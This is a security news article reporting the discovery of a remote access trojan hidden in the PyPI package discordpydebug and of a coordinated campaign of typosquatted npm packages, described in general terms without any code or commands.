Do Son 
Researchers have uncovered a malicious package in the PyPI repository, masquerading as a utility for working with Discord but in reality embedding a fully functional remote access trojan. The package in question, named discordpydebug, was uploaded on March 21, 2022. Since its publication, it has been downloaded over 11,500 times and remains available for installation, despite having received no updates.
At first glance, the package appears to be a simple tool intended for developers working with the Discord.py library. However, analysts from the Socket team discovered that it conceals malicious code capable of establishing a connection with an external command-and-control server and executing instructions received from its operator.
The trojan supports file read and write operations, as well as shell command execution, granting the attacker the ability to exfiltrate sensitive data—including tokens and credentials—modify files, deploy additional malicious payloads, and transmit information back to the attacker.
What distinguishes this malware is its use of outbound HTTP requests for communication with its command server, a technique that enables it to bypass many firewalls and monitoring systems—particularly in development environments where security controls may be relaxed. While the code lacks mechanisms for persistence or privilege escalation, it remains a simple yet potent threat.
In parallel with this discovery, Socket researchers also identified a cluster of counterfeit libraries within the npm repository, impersonating popular packages from other ecosystems. Among the impersonated libraries were clones of beautifulsoup4, apache-httpclient, opentk, and seaborn. All of the fake packages leverage a shared infrastructure, include similarly structured obfuscated malicious scripts, and point to a single IP address—strongly indicating a coordinated campaign likely orchestrated by a single threat actor.
The malicious npm packages incorporate evasion techniques, initiate harmful scripts, steal data, and are capable of maintaining a prolonged presence within infected systems. These incidents underscore the fragility of software supply chains and highlight the critical importance of rigorously vetting third-party code sources—especially within open-source environments.
